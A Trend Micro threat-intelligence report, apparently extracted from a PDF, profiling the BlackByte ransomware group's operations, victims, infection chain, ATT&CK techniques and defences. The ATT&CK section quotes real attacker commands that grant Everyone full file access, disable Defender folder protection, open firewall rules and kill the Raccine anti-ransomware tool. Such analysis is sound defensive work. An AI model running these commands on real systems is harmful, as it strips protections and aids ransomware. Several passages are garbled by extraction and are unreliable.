# Ransomware Spotlight: BlackByte **[trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte)** X BlackByte By Trend Micro Research BlackByte is a ransomware group that has been building a name for itself since 2021. Like its contemporaries, it has gone after critical infrastructure for a higher chance of a getting a payout. What techniques set it apart? View infographic of "Ransomware Spotlight: BlackByte" ----- ac yte debuted Ju y 0 ts st yea o act ty ga e ed t e atte t o o t e ede a u eau o est gat o ( ) a d t e US Sec et [Service (USS). According to a joint advisory by these two government agencies, BlackByte had already gone after at least three US critical](https://www.ic3.gov/Media/News/2022/220211.pdf) infrastructure sectors (government facilities, financial, and food and agriculture) by November 2021. [This advisory shows just how BlackByte was actively establishing itself as a new noteworthy ransomware variant. On October 2021, Trustwave](https://www.trendmicro.com/vinfo/my/security/definition/ransomware) [released a publicly available decrypter for BlackByte. This however did not stop BlackByte as developers released newer versions that used](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/) [multiple keys and ramped up operations, going as far as to warn their victims against using the available decrypter on their website.](https://www.theregister.com/2022/05/19/blackbyte-ransomware-attacks/) [BlackByte’s emergence could be part of a larger scheme. With the purported shut down of Conti, researchers from AdvIntel surmise that](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-conti) [BlackByte is one of the chief new ransomware variants part of its rebranding.](https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups) At present, BlackByte continues to target organizations from all over the world. However, like [LockBit,](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-lockbit) [RansomEXX, and many other](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx) ransomware families, BlackByte avoids attacking Russia-based entities. ## What do organizations need to know about BlackByte? While BlackByte operators use their piece of ransomware in attacks for their own gain, they also run on a ransomware-as-a-service (RaaS) model for their affiliates. We have listed down the key highlights of BlackByte here: **Initial versions used symmetric keys. The earlier variant of BlackByte used the same key in each campaign to encrypt files. It also** used AES, a symmetric key algorithm. This allowed researchers to create a decrypter to help BlackByte victims, thus forcing the group to change their encryption method in newer variants. **It has multiple variants. The first known version of BlackByte was written in C#. Operators then released two Go-based variants. The** more recent Go-variant was introduced around February 2022 and sported modifications particularly in its encryption algorithm. **Archives files using WinRAR. In BlackByte campaigns data exfiltration is done before the ransomware is deployed. This is because the** BlackByte ransomware is incapable of exfiltrating data, instead it archives files using WinRAR then uploads the file to sharing sites. **Uses trojanized** **[legitimate tools. Like most modern ransomware variants, BlackByte uses living-off-the-land binaries. For example, it](https://www.trendmicro.com/vinfo/my/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021)** uses the remote tool AnyDesk to gain further control over a system and for lateral movement. **Involves phishing emails or a known ProxyShell vulnerability for initial access. BlackByte has been known to use phishing emails** or exploit unpatched ProxyShell vulnerability in Microsoft Exchange Servers to gain initial access into a system. BlackByte trajectory seems to point to continuing activity. In fact, reports indicate that BlackByte is among the ransomware operations that [have set their sights on Latin American governments in May 2022. This report is reflected in our own telemetry data as seen in the next](https://www.recordedfuture.com/latin-american-governments-targeted-by-ransomware) section. ## Top affected industries and countries The data used in this section represent the count of unique machines where BlackByte-related activity had been detected. Based on our telemetry data, BlackByte showed a fairly consistent level of activity from October 2021 to March 2022. However, May 2022 detections showed a drastic uptick in number. Figure 1. BlackByte monthly unique detections (October 1, 2021 to May 31, 2022) _Source: Trend Micro™ Smart Protection Network™_ Based on our telemetry data from April 30, 2021 to May 31, 2022, we detected BlackByte activity all over the globe. However, after the spike in [activity in May, Peru outstripped other countries in detection. This is consistent with the reported escalation of ransomware attacks in Latin](https://www.recordedfuture.com/latin-american-governments-targeted-by-ransomware) America, where BlackByte was also reportedly among those that targeted the region. ----- Figure 2. Countries with the highest number of attack attempts for the BlackByte ransomware (April 30, 2021 to May 30, 2022) _Source: Trend Micro Smart Protection Network_ Up to the end of April 2022, the technology sector saw the most BlackByte detections, however, in May, detections in the government sector also shot up. Figure 3. Countries with the highest number of attack attempts for the BlackByte ransomware (April 30, 2021 to May 30, 2022) _Source: Trend Micro Smart Protection Network_ One way to interpret these observations is that the drastic increase stemmed from a single attack that affected several machines. Aside from the reports on ransomware groups targeting Latin America, this explanation is also based on the report that, by their own claim, BlackByte operators had compromised a Peruvian government entity around the time of the increased activity. ## Targeted regions and sectors according to BlackByte leaksite In addition to these detections, we delved into BlackByte’s leak site to see the number of attacks recorded there. We looked at data from August 1, 2021 to May 31, 2022. Based on what we found in the site, BlackByte’s victims were composed mostly of small size businesses. The activity peaked in November 2021. Overall, the leak site has yet to reflect the focused attack on Latin American governments. The distribution of their attacks per region showed, instead, a proclivity for targeting entities based in North America and Europe. ----- Figure 4. Regional distribution of BlackByte victims according to the group’s leak site (August 1, 2021 to May 31, 2022) Based on the leak site data alone, BlackByte operators and their affiliates have yet to show a marked interest in any one sector. We found a relatively even distribution of attacks across industries, which included the following: Construction Materials Healthcare Retail Transportation Energy & Utilities Manufacturing Professional services Automobile Community Foods & Staples Real Estate Government IT Legal services Media and entertainment Comparing the leak site data of BlackByte to other ransomware families, shows that from January 1, 2022 to May 31, 2022, BlackByte was among the 10 ransomware groups with the greatest number of self-reported victims. Figure 5. Top ransomware groups with the greatest number of listed victims in their respective leak sites (January 1, 2022 to May 31, 2022) The data seems to show that BlackByte's operation is beginning to build a name for itself in the threat landscape while still building momentum. The following section shows how it works and how it conducts its attacks. ## Infection chain and techniques Given that BlackByte operates on the RaaS model, its infection chain can vary depending on the target. ----- Figure 6. BlackByte infection chain **Initial Access** BlackByte can arrive in a system by exploiting the ProxyShell vulnerabilities. Exploiting the vulnerable server allows the attacker to create a web shell to the system which is then used to download and drop Cobeacon using Certutil. After the initial access into the system, the attackers use Certutil to download and execute the components that it needs to propagate in the network. After the deployment of Cobeacon, it is then used to execute BlackByte ransomware. **Discovery and Lateral Movement** Based on our data, the actors used NetScan as a network discovery tool that allows the attackers to get a good view of the victim’s network environment. After network reconnaissance, the attackers deploy AnyDesk in the system for an additional level of control over the system. The attackers repeat this process of discovery and deployment of Cobeacon and AnyDesk until it achieves its goals. During the execution of BlackByte, it terminates certain processes and services related to security application to evade detection. **Exfiltration** Once the attackers have sufficiently infiltrated into the victim’s network and identified valuable files, it exfiltrates them using WinRar to archive the files and upload them into file sharing sites such as anonymfiles[.]com and file[.]io. **Impact** ----- O ce t e a so a e s e ecuted, t te ates ce ta se ces a d p ocesses e ated to secu ty app cat o to e ade detect o s t a so connects to its C&C server where it looks for a certain PNG file that contains information critical to encryption and is used to derive the AES128 key. This key is then protected using an embedded RSA key which will then become undecryptable without the private key. The ransomware then deletes shadow copies in the system using vssadmin. Figure 7. Sample ransom note **Other technical details** It avoids encrypting the following files with strings in their file name: obamka.js thumbs.db ntdetect.com ntuser.dat.log bootnxt bootsect.bak ntldr autoexec.bat Recycle.Bin iconcache.db bootmgr bootfont.bin ----- t a o ds e c ypt g es t t e o o g e te s o s msilog log ldf lock theme msi sys wpx cpl adv msc scr key ico dll hta deskthemepack nomedia msu rtp msp idx ani 386 diagcfg bin mod ics com hlp spl nls cab exe diagpkg icl ocx rom prf themepack msstyles icns mpa drv cur diagcab cmd shs It terminates the following services: SQLTELEMETRY SQLTELEMETRY$ECWDB2 SQLWriter SstpSvc MBAMService wuauserv ----- t te ates t e o o g p ocesses ou d t e a ected syste s e o y agntsvc CNTAoSMgr dbeng50 dbsnmp encsvc excel firefox firefoxconfig infopath isqlplussvc mbamtray msaccess msftesql mspub mydesktopqos mydesktopservice mysqld mysqld-nt mysqld-opt Ntrtscan ocautoupds ocomm ocssd onenote oracle outlook PccNTMon powerpnt sqbcoreservice sql sqlagent sqlbrowser sqlservr sqlwriter steam synctime tbirdconfig thebat thebat64 thunderbird tmlisten visio winword wordpad xfssvccon zoolz anydesk chrome opera msedge firefox iexplore explorer winlogon SearchIndexer wininit SearchApp SearchUI Powershel ## MITRE tactics and techniques ----- **InitialInitial** **PrivilegePrivilege** **AccessAccess** **PersistencePersistence** **EscalationEscalation** **Defense EvasionDefense Evasion** **DiscoveryDiscovery** **Lateral MLateral M** **T1190 -** Exploit PublicFacing Application _It has_ _been_ _observed_ _to be using_ _the_ _ProxyShell_ _exploit to_ _deliver_ _China_ _Chopper_ _web shell_ _as its initial_ _arrival._ **T1053.005** - Scheduled Task/Job: Scheduled Task _It creates a_ _scheduled_ _task to_ _execute its_ _java script to_ _proceed_ _with its_ _routine on_ _bootup._ _Task Name:_ _Joke_ _Trigger:_ _Once, at_ _00:00_ _Action:_ _wscript.exe_ **T1134** - Access Token Manipulation _This_ _ransomware_ _modifies the_ _registry to_ _elevate local_ _privilege and_ _enable_ _linked_ _connections._ **T1140 - Deobfuscate/Decode Files or Information** _It initially arrives as an obfuscated Java Script file which will be decoded_ _upon execution._ **T1222 - File and Directory Permissions Modification** _It uses mountvol.exe to mount volume names and icacls.exe to modify the_ _access on the volume to "Everyone."_ _C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q_ _It also controlled folder access using PowerShell:_ _"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-_ _MpPreference -EnableControlledFolderAccess Disabled_ _It also modifies firewall settings to enable linked connections:_ _"C:\Windows\System32\netsh.exe" advfirewall firewall set rule_ _group="Network Discovery" new_ _enable=Yes "C:\Windows\System32\netsh.exe" advfirewall firewall set rule_ _group="File and Printer Sharing" new enable=Yes_ **T1562.001 - Impair Defenses: Disable or Modify Tools** _It disables Raccine, which is an anti-ransomware utility, using these_ _commands:_ _taskill.exe /F /IM Raccine.exe_ _taskill.exe /F /IM RaccineSettings.exe_ _schtasks.exe /DELETE /TN \"Raccine Rules Updater\" /F_ _Deletes raccine autostart:_ _HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run_ _Name = “Raccine Tray”_ _HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine_ **T1083 - File** and Directory Discovery _This_ _ransomware_ _discovers_ _files and_ _directories_ _by first_ _enumerating_ _the logical_ _drives. Once_ _enumerated,_ _it then_ _changes the_ _access_ _control of_ _files and_ _directories_ _so that it_ _can have full_ _access over_ _them. It will_ _then go_ _through the_ _directories_ _and traverse_ _it for target_ _files to_ _encrypt._ **T1069.002 -** Permission Groups Discovery: Domain Groups _It uses the_ _RootDSE_ _entry from_ _the active_ _directory to_ _get a listing_ _of the_ _hostname_ _under that_ _domain in_ _preparation_ _for its_ _propagation_ _in the_ _network. It_ _enumerates_ _1000_ _hostname in_ _the domain._ Remote System Discovery _After getting_ _the_ _hostname of_ _the remote_ _systems, it_ _attempts to_ _ping the_ _systems to_ _see if it is_ _alive and_ _accessible._ _Then it_ _proceeds_ _with the_ **T1570 - L** Transfer _It checks_ _present:_ _C:\Users\_ _(infection_ _system)_ _It doesnt_ _propagati_ _It checks_ _system if_ _following_ _accessibl_ _\C$\Users_ _\Users\Pu_ _It then cre_ _infection_ _system, w_ _\Users\Pu_ _\C$\Users_ _It then co_ _file in the_ _share and_ _through s_ _which wa_ _start of ro_ ----- **Initial** **Access** **Persistence** **Privilege** **Escalation** **Defense Evasion** **Discovery** **Lateral M** _transfer to_ _the public_ _share folder._ ## Summary of malware, tools, and exploits used Security teams can watch for the presence of the following malware tools and exploits that are typically used in BlackByte attacks: **Initial Access** **Execution** **Discovery** **Lateral Movement** **Collection** **Exfiltration** ProxyShell Certutil NetScan AnyDesk WinRAR Exfiltrates to the following C&C anonymfiles[.]com file[.]io China Chopper web shell Cobeacon Cobeacon ## Recommendations Organizations face both established ransomware families as well as newer variants that are just entering the fray. Like many newer ransomware families, BlackByte is readying itself to take the spot of any big-game ransomware operation in decline. However, underneath it all could be a more intricate scheme of threat groups dispersing under new monikers. As with the case of BlackByte, knowing its notable tactics, while also staying knowledgeable of bigger trends can help organizations create an effective strategy for ransomware attacks. In the case of BlackByte, prevention is key by keeping employees wary of phishing tactics and keeping up with security patches such as those for ProxyShell vulnerabilities. To help defend systems against similar threats, organizations can establish security frameworks that can allocate resources systematically for establishing solid defenses against ransomware. Here are some best practices that can be included in these frameworks: **Audit and inventory** Take an inventory of assets and data Identify authorized and unauthorized devices and software Make an audit of event and incident logs **Configure and monitor** Manage hardware and software configurations Grant admin privileges and access only when necessary to an employee’s role Monitor network ports, protocols, and services Activate security configurations on network infrastructure devices such as firewalls and routers Establish a software allowlist that only executes legitimate applications **Patch and update** Conduct regular vulnerability assessments Perform patching or virtual patching for operating systems and applications Update software and applications to their latest versions **Protect and recover** ----- p e e t data p otect o, bac up, a d eco e y easu es Enable multifactor authentication (MFA) **Secure and defend** Employ sandbox analysis to block malicious emails Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network Detect early signs of an attack such as the presence of suspicious tools in the system Use advanced detection technologies such as those powered by AI and machine learning **Train and test** Regularly train and assess employees' security skills Conduct red-team exercises and penetration tests A multilayered approach can help organizations guard possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior can also help protect enterprises. [Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools](https://www.trendmicro.com/en_us/business/products/detection-response.html) early on before the ransomware can do irreversible damage to the system. [Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-one-workload-security.html) protection is made possible through techniques such as virtual patching and machine learning. [Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block](https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/email-inspector.html) malicious emails, including phishing emails that can serve as entry points for ransomware. [Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats](https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint.html) and ransomware, ensuring the protection of endpoints. ## Indicators of Compromise (IOCs) The IOCs for this article can be found [here. Actual indicators might vary per attack.](https://documents.trendmicro.com/images/TEx/articles/ioc_spotlight_blackbyteXwCUeHS.txt) HIDE **Like it? Add this infographic to your site:** 1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V). Image will appear the same size as you see above. -----